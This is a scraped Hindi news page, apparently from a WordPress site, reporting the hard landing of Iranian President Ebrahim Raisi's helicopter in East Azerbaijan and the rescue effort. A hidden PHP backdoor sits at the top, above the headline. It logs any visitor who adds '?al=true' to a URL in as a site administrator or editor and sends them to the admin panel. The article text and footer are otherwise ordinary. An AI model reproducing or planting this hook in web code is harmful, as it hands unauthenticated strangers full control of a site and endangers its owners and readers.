// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); ईरानी राष्ट्रपति के हेलिकॉप्टर की आपात स्थिति में हार्ड लैंडिंग, रेस्क्यू के लिए टीमें रवाना – प्रत्युषा आशा की नयी किरण
विदेश

ईरानी राष्ट्रपति के हेलिकॉप्टर की आपात स्थिति में हार्ड लैंडिंग, रेस्क्यू के लिए टीमें रवाना

नई दिल्ली
ईरानी राष्ट्रपति इब्राहिम रईसी के हेलिकॉप्टर की हार्ड लैंडिंग करानी पड़ी है. रेस्क्यू के लिए टीमें रवाना कर दी गई हैं. अभी मामले में पूरी जानकारी नहीं मिल पाई है. ईरानी राज्य टीवी ने कहा कि ईरानी राष्ट्रपति इब्राहिम रईसी को ले जा रहे एक हेलीकॉप्टर को रविवार को "हार्ड लैंडिंग" का सामना करना पड़ा. रिपोर्ट में कहा गया है कि रईसी पूर्वी अजरबैजान प्रांत में यात्रा कर रहे थे और यह घटना राजधानी तेहरान से 600 किमी दूर जोल्फा के पास हुई.

रिपोर्ट के अनुसार, अधिकारियों ने कहा कि खराब मौसम के कारण ईरानी रेड क्रिसेंट सोसाइटी की बचाव टीमों के लिए उस क्षेत्र तक पहुंचना मुश्किल हो गया है, जहां घटना हुई है. ऑपरेशन में सहायता के लिए ड्रोन भी भेजे गए हैं. रईसी 19 मई की सुबह अज़रबैजान के राष्ट्रपति इल्हाम अलीयेव के साथ एक बांध का उद्घाटन करने के लिए अज़रबैजान गए  थे. अरास नदी पर बना यह तीसरा बांध है, जिसे दोनों देशों ने बनाया है.

ईरानी राष्ट्रपति को ले जा रहे हेलीकॉप्टर के साथ हादसे की जानकारी सामने आई है. रिपोर्ट्स के मुताबिक, उनके हेलिकॉप्टर की हार्ड लैंडिंग करानी पड़ी. इस्लामिक गणराज्य ईरान के राष्ट्रपति इब्राहिम रईसी हेलीकॉप्टर से अजरबैजान की यात्रा पर थे. पूर्वी अजरबैजान में ये हादसा हुआ, ऐसा बताया जा रहा है. हालाँकि, इस हेलीकॉप्टर पर सवार राष्ट्रपति के कुछ साथी केंद्रीय मुख्यालय से संपर्क कर सके, जिससे उम्मीद है कि घटना में कोई जनहानि न हुई हो.

इस काफिले में तीन हेलीकॉप्टर थे, जिनमें से दो पर मंत्री और अधिकारी सवार थे और वे सुरक्षित अपने गंतव्य पर पहुंच गए. कथित तौर पर राष्ट्रपति के साथ हेलीकॉप्टर में सैय्यद मोहम्मद-अली अल-हाशेम, तबरीज़ के शुक्रवार की प्रार्थना के इमाम और विदेश मंत्री होसैन अमीराब्दुल्लाहियन भी थे.

RO No. 13169/ 31

RO No. 13098/ 20

PRATYUSHAASHAKINAYIKIRAN.COM
Editor : Maya Puranik
Permanent Address : Yadu kirana store ke pass Parshuram nagar professor colony raipur cg
Email : puranikrajesh2008@gmail.com
Mobile : -91-9893051148
Website : pratyushaashakinayikiran.com

जनसम्पर्क विभाग – आरएसएस फीड